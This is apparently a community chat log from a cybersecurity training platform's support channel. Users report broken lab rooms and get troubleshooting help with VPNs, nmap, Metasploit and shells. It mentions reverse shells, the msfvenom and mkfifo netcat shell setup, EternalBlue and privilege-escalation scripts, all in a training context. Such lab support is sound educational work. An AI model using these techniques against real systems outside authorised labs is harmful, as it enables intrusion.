no because web browser is fine i can access other websites and locally hosted websites

same issue on different web browser

sudo ip link set dev tun0 mtu 1200

Cah you please try this 🙂

In a separate terminal,.leave the vpn running.

ok

woah that fixed it

thank you sooo much

Gave +1 Rep to @quaint sparrow

can you please explain it?

and any way to improve this

That command lowers the packet size that is sent over each transaction.

Nmap scans are also very slow

messing with min rate or timing params

no T5

-T4 or -T5 are the easiest ways to speed up nmap

You're scanning all ports. Lol

but none are showing up

-F is a sane alternative if you don't need to check all ports

what room are you doing???

Hi, I'm trying the MrRobot lab and when I scan with Nmap the first scan displayed ports 443 open. I was unable to browse to it, I have scanned again and this time port 443 is not showing on the scan. Anyone else experienced such issues?

could be that you did not let the target machine run long enough to spin up but eh dunno

how long do they usually have to spin up for? are we able to reboot the machines?

3-7 mins

yes you can reboot it by hitting the terminate button and then hitting the start machine button again

and there is no limits on how many times you can do that as far as shadow has heard or seen

I ran another scan and now I can see port 80. I'll leave it a few more minutes and then I'll reboot. Thank you

Gave +1 Rep to @rugged canyon

No worries I rooted that box

Hi, I want to report a typo that is misleading in OWASP API Security Top 10 - 1 room, it asks you to put this Authorisation-Token header in header field, but the problem is it will get u 403 forbidden if u try it like this and you will be stuck unless you make it Authorization-Token using z instead of s

I cannot for the life of me get the attack boxes working in Microsoft Windows Hardening or Active Directory Hardening, it just loads a white screen on both, thought it was my shitty laptop but doing it on my desktop now too

anyone knows why i can never connect to the site in the vulnersity room? It shows me the connection cannot be made and then when usin gobuster once again i get an error (which i am guessing is related to the one with the site)

Are you specifying the correct port?

just wanted to mention, that in the room 'cryptographyinfo' task 7 (in the security engineer pathway), when you let the MS screen reader (using latest Edge) play on the tables, it creates an empy column when jumping between entries, making it a 3x3 (excluding headers here) table from the 3x2 original. Not yet a well established hacker, but I think you could exploit this, no?

I can confirm this issue currently on my end too https://tryhackme.com/room/islandorchestration Team, could you please take a look and advise?

Jr. Penetration tester
"What is the shell ?" Room. I'm not able to get a response from the Windows server when i upload the php code and modify the url it keeps showing only white screen without connecting to my listener

Ill try again today to see.

Pay attention to the nmap scan. 🙂

Alrighty ty

Gave +1 Rep to @quaint sparrow

In the room, HaskHell (https://tryhackme.com/room/haskhell), when uploading the reverse shell, it results in an 'Internal Server Error'. I tried to upload it (in haskell format) a couple of times in the last few days, but the results were the same.

top write up referenced in the vid is dead in vulnversity

Which video? Most of the write ups are not hosted and simply linked to THM so they have no control which ones are up.

The video on the main page, I didn't use it, but was interested in how easy it could have been done. It references a walkthrough in the video, which is at the top of the list provided, but it no longer exists. Just thought I'd mention.

in throwback task 31 the first image is not loading or does not exist

Hello, I would like to report a small mistake in the room "Windows Fundamentals 1" in Task 2 - Windows Editions. The sentence "Then arrived Windows 10, which is the current Windows operating system version for desktop computers" is wrong because the current Win OP is Windows 11.

If you look at the bottom portion of the screen, you will see the room age. Thus, it was correct that Windows 10 is the current version when the room was released or submitted by the room creator.

idk if this is a bug or not but in https://tryhackme.com/room/linprivesc# Task 6 I was able to get the flag without actually becoming root

how???

if you are refering to task 7 that is intended but don't think so for task 6

Wait ill try it once more in a bit and

Yeah i might be mistaken so ill recheck

yeah it was task6

ah wait of course

so it's not?

yeah it is probably intended or technically a side effect of which binaries you can run as sudo

assuming you used one of those to read the flag

i didnt use anything

just went to the directory and used cat

wait you just used cat ????

oh wow

yeah

yuup that is a bug in the permissions of the file then

thanks for reporting

ah ok

there's also some issue with nano

it says "problems with file history"

well if you have world readable on a file like it has it does not matter what tool you use to read it

that has to do with permissions to write in folders and stuff.. i.e generally not a huge problem

wait yeah, works fine if i use sudo

yuup as then it is running as root and therefor have permissions

also this one isnt really a bug, but in https://tryhackme.com/room/metasploitexploitation Task 2 -> I think it's supposed to say 10000 instead of 1000

submitting bug for room Grep.v.1.7

A few of the domains required to be accessed for this room to be completed are not diaplaying any content. Specifically, the domains load without error, but there is no html content being displayed. Inspecting the page and viewing source show nothing, but the domains do show up during a fuzz and are accessible.

You are right, using 1000 and 10000 is confusing in that sentence. But I would say the opposite: it's supposed to say 1000 instead of 10000

1-10000 is the default value for metasploit.
if you set 1-1000 (thinking it's the same as the 1000 nmap default ports), no because msf scan ports 1 to 1000 while nmap scan 1000 most used ports.

this makes more sense like this?

Does make sense ?

Hi!
Anyone else tried the Intro to Security Architecture room? I'm having issues with answer validation within the static-site; when I input the same values as the name and description, if accepts the former but flags the latter as incorrect...??
set firewall name <value X> description <value X>

That is intended I believe

Yeah that works

I think there is a badges related bug for the new Security Engineer Path. Didn't get the Intro and Risk Management badge. I create a ticket

https://tryhackme.com/room/ctf , not able to ping only this machine, vpn file alright, other machines working fine, only this machine, can anyone check , please

Have you tried other enumeration? Not all machines respond to pings

hmm i was thinking the same thing, then i thought this is a easy linux machine, but alright, i will keep that in mind, thank you

Gave +1 Rep to @hazy tiger

this could be a bug, I'm not sure.

room is tryhackme.com/room/burpsuitebasicsold, I'm told to check the website and explore it, but the site actually never responds, and it stays loading in a loop.

and right now I noticed the word old in the URL, why is that? is there a new module?

The BurpSuite module was updated recently, you can see the new module here https://tryhackme.com/module/learn-burp-suite. The basics room is the first one within the module

Hello everyone, this is my first message on Discord, I hope it's in the right section. I would like to report a "bug" regarding the "Soc Level 1" learning path. More specifically, the answers within the "Cyber Threat Intelligence" module -> "Threat Intelligence Tools" -> "UrlScan.io" ("What is TryHackMe's Cisco Umbrella Rank?" and "How many domains did UrlScan.io identify?") are not in line with the information found on the recommended website. Thanks.

so I have to leave that room and pursue the one you sent me?

Use the screenshots provided in the task.

I'm doing the John the Ripper room, I'd like to do the task from the AttackBox. Is the hashlists for the tasks already on the box somewhere? There seems to be some text missing under Task 4.

They are not.

Is there any way of accessing them without having to log on the website on the AttackMachine? For the .txt it's not too much of a hassle since you easily copy paste, however with the zip that becomes a little bit more cumbersome.

Not on the attackbox, no.

Unless when I have time I can send them to you via updog.

Hi Guys.

Not sure whats happening with the Upload Vulnerabilities room task 5.

Never had issues with shells and this is giving me alot of hasstle!

• Ammended the shell with my IP (attack machine ip)
• Uploaded file to site.uploadvulns.thm.
• Travelled to the found directory on the site (it is the correct directory - i checked)
• Its not showing the upload? So i cant execute the php if its not uploading.

Any reason why the site isnt uploading?

Hi, there might be an error in Intro to log analysis task 6 question 2. It asks for how many http 200 responses were logged in total, using wc, manual counting and online counters return 52 lines but I got 71 by bruteforcing the answer
Or am I missing something?

i found a typo in a room on one of the learning paths, is this the appropriate channel to report it??

Yep!

https://tryhackme.com/room/principlesofsecurity
"Applications or services that handle information of multiple users need to be appropriately configured to only show information relevant to the owner is shown."

its more so the wording at the end seems to be a bit jumbled lol

https://tryhackme.com/room/securesdlc

Task 7 - last question:
"When do you typically carry out Vulnerability Assessments or Pentests?"

Not truly a bug, but I think the answer needs to be fixed. According to the paragraph directly above the question, the answer is "Operations and Maintenance" The correct answer is "Operations & Maintenance." Took me some needless troubleshooting to figoure out the single character is the & symbol. It's not meant to be a trick question (it's not a CTF room by any means).

I would suggest updating the answer to reflect the text above it -- "Operations and Maintenance" to avoid confusion 🙂

https://tryhackme.com/room/authenticationbypass
Minor technical mistake: in task 4 of Authentication Bypass, there is a code snippet, which is then referred to as PHP code ("Because the above PHP code ..."). However, the code snippet seems to be JavaScript code. The PHP equivalent of this if statement would be substr($url, 0, 6) instead of url.substr(0, 6). Furthermore, the description of === seems to imply that == would not check casing. This example would also work/have a logic flaw with just the 'normal' ==.

:hammer: maheshmiskin#2227 has been banned.

Metasploit: Exploitation room, task 2, questions 1/2:

receiving the following error upon trying to run the netbios scanner: "[TARGET_IP] cannot load such file -- active_record/associations/has_many_association"

google tells me this is a Ruby on Rails issue, did using msfupdate bork something internally?

Are you using an ip or literally "Machine_ip" ?

Just something I thought I'd bring up with the introtologanalysis room, it looks like the IntroToLogAnalysis directory is missing on the Attackbox. It says it should be in the /root/Rooms directory but the only intro I see is the introdigitalforensics directory.

I found a bug in the SQLInjection-Room: https://tryhackme.com/room/sqlinjectionlm - in Blind SQLi - Boolean Based based section: By guessing the table name the last letter or to say character '_' is also valid (instead of 's')
EDIT: Ok, I enumerated another (the wrong) table 'analytics_referrers' which obviously doesn't hold user login data. Ok my bad... BUT the correct table is also susceptible to this bug, also with the last character

Is there a bug with a question in the Processes 101 task for Linux Fundamentals 3? I keep getting incorrect answer even though it should just be the reverse of the above question, which I got right. The hint also suggests that I'm doing it corectly, so I can't figure out if it's actually me, or a bug.

Are you sure you're getting it right?

Fairly certain. I don't want to post answers here, but if the question above is "stop" this one is "start"

What are you typing?

apparently it was "enable" and not "start." I don't understand why that is. I'll have to do a Google sesrch.

The answer is in the question.

We're wanting the service to start at boot.

Gotcha. I'll re-read the text. Thank you for that explanation.

Gave +1 Rep to @quaint sparrow

Sounds like msfupdate updated to a newer version of ActiveRecord, but either some metasploit code or one or there gems isn't compatible with the new version? I'd ask in Metasploit's Slack or submit a bug to them explaining the steps you did (1. Ran msfupdate, etc).

• https://metasploit.slack.com
• https://github.com/rapid7/metasploit-framework/issues

the actual ip

This is minor. In Introduction to Malware: https://tryhackme.com/room/malmalintroductory Task 12, half way down it says "After import. Navigate to "View -> Imports""

It should say "View -> Import" without the S at the end of Imports.

One more problem in that room. This one is more serious. Task 13. The screenshot shows a file in c:\program files (x86)\notepad ++. The Notepad++ folder is not in Program Files (x86) It is in Program files.

Here is a good screenshot

Here is the bad screenshot:

And another problem. That uninstall.exe file doesn't work with IDA. Here is the error:

Some more news. These issues don't prevent you from completing the room. That relies on files in the Task 13 folder. The issue is the instructions make it appear that we are supposed to perform the actions. Apparently, that's not possible.

Which is fine. It's just unclear the way it's written.

Just noticed this as well

Yep, we are aware, should be there soon 🙂

owasp top 10 room task 7 site not reachable. when i moved on to next talk it works.

Hey everyone on soc path 1 level one on the CTI part I'm on the opencti section and the opencti dash is not accessible having allowed the box to run for a long time to start the cti dash

Passive Reconnaissance, Task 5 (DNSDumpster) should be changed to reflect current THM layout. The answer is remote (Per Google), but that no longer shows on DNS Dumpster.

** Room WebOSINT has an outdated answer in task 7. **
(link: https://tryhackme.com/room/webosint)
In this task we need to use viewdns to get the thing in common between 2 websites. On the ||ip history|| is the link between the two. This is shown in my screenshot.

However, the answer expected is ||Liquid Web, L.L.C.|| eventhough the current history results show ||LIQUIDWEB||.

I spent 8 hours trying to do Task 7 in Network Services, at the end I had to google it because there's clearly something wrong with the room, when pasting the msfvenom payload on the telnet server IT WOULDN'T give me reverse shell,

I tried on my own Kali VM for about 4 hours and I could ping my machine from telnet, but iNO MATTER HOW MANY times I tried, I could not receive the shell back, finally i tried for another 4 hours on the web attackbox, and finally it connected, but I WOULDNT give me the flag as you can see on the screenshot the connection was established but the shell wouldnt respond to any commands,

this is extremely frustrating, to just spend a whole day to finally find out the rooms buggy and I wasn't ever going to get the flag anyway, this almost made me give up on the whole cybersecurity thing, because I was getting imposter syndrome, but no, IT was THE BOX that didnt work! And now I'm just extremely burnout.

Looks like your command should be mkfifo instead of kfifo in Telnet.

Omg!

In Room Subdomain Enumeration https://tryhackme.com/room/subdomainenumeration
you should google "-site:www.tryhackme.com site:*.tryhackme.com" which should return a site starting with "b". However, it doesn't (only some starting with different letters). It can be searched using crt.sh, but this should be somehow fixed.

I'll forward that, thanks for reporting 🙂

Gave +1 Rep to @tired hare

Hello!

webenumerationv2 room's conclusion recommends to try out RPWebScanning (Walkthrough) room, but that room is private.

Bumping this one.

Hi,
i'm attempting to do the tomghost room, when i connect to ssh, do my things (nothing anormal just basic linux commands) the ssh connexion freeze and the ip didnt respond at every ping i try, so i need to reboot it (and it's the third time) and always the same thing after 2/3 min of connection. thanks for your time

To get your configuration working, make these configuration changes on the client:
/etc/ssh/ssh_config
Host *
ServerAliveInterval 100
Do you have a chance to try it?

hi, there is only Host * , no ServerAliveInterval

and can't edit because of permissions (still user yet, can't become root because of multiples crashs when i attempt something)

the machine seems very slow but i don't see any big process in the background or idk

In shodan room, Task 3, answers have changed(as of 12 Oct, 2023).

1. Top operating system is now ||"5.7.39-42-log"|| and not ||"5.6.40-84.0-log"|| as mentioned in the Q hint.
2. Nginx for Google ASN is now having more ||443/HTTPS w/ SSL|| ports than ||80/HTTP|| ports
3. Top OS in Los Angeles is no longer ||Debian||, it's ||Ubuntu||.

echo "ServerAliveInterval 100" >> /etc/ssh/ssh_config, can you try that without using sudo or either way with sudo.

In room passiverecon, Task 6, 3rd most common port for nginx has changed from ||5001|| to ||5000||

i have finished the challenge with a lot of patience, response time was about 2/3s for each commands. so i'll try tmrw to know the source of that !

Task 12 "Scoping and Targeting"

We just chose to disable logging for out of scope traffic, but the proxy will still be intercepting everything. To turn this off, we need to go into the Proxy Options sub-tab and select "And URL Is in target scope" from the Intercept Client Requests section:

the image below it is showing to select the option in the RESPONSE section rather than the REQUEST section

room: CTF collection Vol.1
Task: 18, dig up the past
there is no more the backup on waybackmachine

can someone give me the flag?

whatever i found it

@oblique panther please don’t post answers here

I checked it just now and it is still there.

Okey, sorry.

Yes, in there.

Mh, wait I’ll send u a screenshot

I can send you the result I got as well, but I'll have to delete it the soonest so as not to give away the answer to others.

Ok!

really strange tho, now there is

thank u the same sorry for that

maybe i spelled bad the site

Probably the filtering?

but i did copy and paste

filtering?

what do u mean?

After you copy and paste the site, you still need to filter the date.

no i swear there was no backup

i mean there was only one but not the right one

room: Lian_Yu

is the video necessary to do the room?

not sure

No, it isn't.

Room : intromalwareanalysis
Task 6 can't be done as it refer to an report which doesn't exist anymore on Hybrid analysis.
Check the hash of the sample 'redline' on Hybrid analysis and check out the report generated on 9 Dec 2022. Check the Incident Response section of the report. How many domains were contacted by the sample?
there is no more report of Redline - 9 Dec 2022

Hi guys,
I'm on the "Blue" Room, Task 2.
I can't run the exploit idk why. I tried on my vm, reboot the machine 2 times and tried on attackthebox as well, nothing work for me.

did you set the LHOST?

Bruh

?

Nop 🙄

So it was listenign on 192.168.xxx.xxx ? 😄

Surely 🫣

Thanks anyway ! 😂

!dark

At complete beginner path
I can't download linenum.sh,linpeas.sh and lse.sh.
Also i don't have the permissions to copy it into a file or the ability to change the chmod. Or even wget through simple http server or even through scp.

Basic pentesting room

Also at Vulnversity room. I used a manual command to search for suid files

Because the remote machine didn't allow me to use any of the previously mentioned files.

Hi There, I lost my progress in burpsuite room, anyone had the same issue?

Module was updated, its a new module

okok, thanks!

Download the files into which directory? In the target?

/home/user

Does the user you have access to have write permissions on those folders you intend to write or save files into? Have you tried the /tmp folder?

It worked. Thanks

Gave +1 Rep to @unborn pulsar

How do you do this ? pinpoint, i think this is the experience.

Metasploit will tell you which IP it's listening on.

You'll also know it's not listening on tun0 as you won't set it.

Yes that's true, perfect.

Room: Intromalwareanalysis, Task 6, the question asks you to check the report on Hybrid Analysis created on 9 Dec 2022. This report no longer exists for the redline hash given. Further, finding a medium writeup, I checked the existing reports on Hybrid Analysis and none of them contain that number of contacted domains

Room: phishingemails2rytmuv, Task 5. The help article on help.netflix.com has slightly different wording than the answer ("email" instead of "message"). Without clicking "Hint" to view a random article, I would imagine most users would look to the official source of Netflix for this answer.

Hi @dusky junco, I just ran into the same issue as Sapient did on this room. I wanted to go through the full Jupyter 101 path as a quick refresher, but the support material link is down, and I cannot start Jupyter in the attack box. I've spent some time troubleshooting it, but as far as I can tell, the room is broken right now and can't be completed. Are you able to update it?

Hi everyone, I'm working on Blue box, and i'm trying to mannually exploit eternal blue (with the old python exploit) .. When i'm trying to lunch the exploit with user guest, i get an error : STATUS_ACCOUNT_DISABLED even with a restart of the VM, any hint to resolve my case ? (i manage to run the exploit correctly on others box..) Thanks ! ( i just tried with metasploit and it's working correctly..)

ROOM : THMREDLINE1.7.3 - Task 5
Not enough space on the machine to import the IoC file

Also maybe give a bit more resources on the machine, had to wait 1 hours to complete the scan and the redline analysis

Source Code Security https://tryhackme.com/room/sourcecodesecurity:
Task 8

The gitlab docs for gitlab_ci_yaml leads to a "page not found" error -

after connecting to the target system I have problems like this, the codes I wrote do not work. I have closed and restarted the room, changed my vpn but still the same. Can u help please

I can't move forward in any way. I'm stuck here.

Do a Google search on how to upgrade or stabilize netcat shells.

obviously this still is an issue... now you have to look up 9 Dec 2022, but this also isn't listed on hybrid analysis. Nevertheless great room.. 🙏 !

Did you figure out the issue with Upload Vulnerabilities task 5? I think I'm have the same issue in that step. I can bypass the client-side filtering, but I still can't upload a non-png file. I had other issues too. The first one was that the demo-subdomain was being rickrolled, which made it difficult to use in later steps. And subdomains references in task 3-4 seemed to be the wrong ones, out of lock-step.

Think that room has got a few issues tbh mate. I tried the same process on dummy machines and worked so had to be the room imo

Thanks! I'll just step over it for now.

Gave +1 Rep to @edgy sail

I swear https://tryhackme.com/room/btredlinejoxr3d needs an increase in disk space

gotta delete task 7 (endpoint content) to free space to do task 6 then restart the room to do task 7

Hi

Web Enumeration room, introduction to Nikto, link is pointing to 404 page

I want to report a bug at Burp Suite: Intruder room, Task 12 doesnt work unless you do it from attack box! Any idea?

Hello. I believe the Operating System Security room has an issue. I am supposed to use SSH to log in to some machine. It keeps telling me permission denied.

https://tryhackme.com/room/operatingsystemsecurity

Hey All, doing the Year of the Jellyfish, yesterday the machine randomly lost connection and i was not able to ping it

Having the same issue today:

Is my ip blacklisted?

did you get this one from the room, yeah?

Can you nmap it?

Yeah i did, and no nmap is also not working sadly

It's like my ip is blacklisted somehow

Is it still up?

Lemme spawn a new instance and try again

Still cant ping lemme try the nmap

I am however able to nmap it

Upon trying to connect to the websites i get an error tho

oh nevermind

It somehow worked this time

Thanks 👍

Im working in Wreath Room. on step 17 when i put in ./nmap-USERNAME -sn 10.x.x.0/24 -oN scan-USERNAME, I get an error message stating: ./nmap-USERNAME: line 1 syntax error near unexpected token 'newline' and ./nmap_USERNAME: line 1: '<DOCTYPE HTML.' . Any idea why this is happening?

You downloaded the page from Github rather than the binary and are now trying to execute a HTML document 🙂

It was actually from the hyperlink on the lab

Which task?

17?

That should just give you the binary. Worked for me 🤷‍♂️
I've updated the link to be identical to the one on the Github page for the binary though. See if that works

I'd also suggest running file on things you download before trying to execute them 😆

at the bottom of room Web Enumeration v2 Task 13 is the link https://tryhackme.com/room/rpwebscanning but it says room is private.

WINFUN1.1 in WIndows Fundamentals 1 is not working for some reason .

VPN is working just fine but can't ping the machine

Oh gods I do that all the time

You can't ping a windows machine by default.

It's a security setting that would need to be disabled so you can ping it.

I can ping the other machines .... i winfun2,3

Yes i did thought about that . and try to connect with remmina anyways . din't worked connection issue /

Yeah, the hint states the website doesn't work

Yes. it is. How am I supposed to get the flag and finish the room?

There is a bug in this room: https://tryhackme.com/room/bppenguin

When you remove the "unused accounts" and also remove home directories, etc passwd, group and any cronjobs (didnt exist in this case) the get-flags program seems to break, and youre unable to get the flag for this task.
Which is something you should do, not leave behind a bunch of crap

You don't need the flag anymore.

Nobody is you to spend bitcoin?

Actually, I withdraw my report. I didn't intend to waste any time.

No worries. 🙂

I need it because otherwise the task doesn't appear as completed.

Unless it's changed, the task doesn't require a flag.

Look, I've done Pyramid of Pain and as you can see the room is not marked as completed.

You must have missed a task?

Then it's a different sort of bug you got.

I sent a ticket yesterday.

Staff don't work weekends, if you E-mailed.

I know. I hope they'll answer next week

There's a problem with task 3 in the 'easypeasy' ctf room.

What's the problem?

answer: 65524 but doesn't accept

Ah, I see the issue.

It's not asking for the port number, it's asking for the service.

thank you

Can you remove this please so as not to spoil it for other users? Thanks.

sorry..

Hey, I'd just like to mention that the room WebOSINT is not pratically doable without previously written writeups (informations have been modified and aren't as easy to get as initially planned (sometimes you can't even guess))

Example : you're supposed to check the number of times the domain "republicofkoffee.com" has changed names.
The answer is 4, but when you do the research with the given tool, you get over a thousand (I didn't count them)

this is the sad reality of osint challenges... they quickly get outdated or broken due to changes in how websites and stuff are handled

A mistake in room https://tryhackme.com/room/redteamnetsec, task 6, using proxy servers. In the example nmap command, the flag --proxies is missing

Tried to view the room, but it seems the link is either not working or incorrect.

Oops, made a mistake when typing it over from my laptop to my phone, should work now

Found another mistake, in room https://tryhackme.com/room/sandboxevasion, task 4, taking a nap, the example code is wrong. It should contain example code for sleeping but instead contains a copy of the example code from the querying network information section. There's also a mistake in that code; there are parentheses missing at the function call (should be isDomainController() == TRUE)

I can't find the lesson files on the attack box for this room
https://tryhackme.com/room/johntheripper0
using a share anywhere link to work around it but am I missing them entirly or is there some other way to transfer these files to work on in the attack box enviroment.

Are you using a VM?

yes Virtual Machine attack box in browser?

So no, you're using the attackbox.

The files aren't on the attackbox, I'm sure it's in the massive list I've gave Ben 😂

lol

sorry to add.. at first i was trying to see if i could vpn from my machine and use SCP to transfer them over .. but figured the in machine browser and a share link would work for now.. just rather use wget or scp or someting to send them over but .. just wanted to help get it on the radar etc.

You could in theory.

But you'd need to be on the network

And I don't suggest putting your host on the VM.

I have an idea.

wget http://10.5.11.163:9000/hash1.txt

Try that command

so vpn in my machine and then use wget or is that IP the loaction of the class files.. change file name per task accordingly?

That's my VM.

I'm serving a python server for you to download them.

Use the attackbox.

wget http://10.5.11.163:9000/secure.rar
[10:19 AM]
for example

The file names are what they're called.

So if the python server is used in that directory with that name.

bummer the send anywhere link wont take the rar file.. the wget commad

wget http://10.5.11.163:9000/secure.rar is hanging on connect

no way for me to vpn in on my client and SCP them over via ssh or anything?

On your host?

from the attack box..

im just gunna bit the bullet and log into the THM class room from the attack box and download that way .. just didnt want to log into the VM with my real account or anything for some reason

plus for some reason it keeps resizing and shrinking the browser while its loaded into a hard to read / use window

I wouldn't suggest that...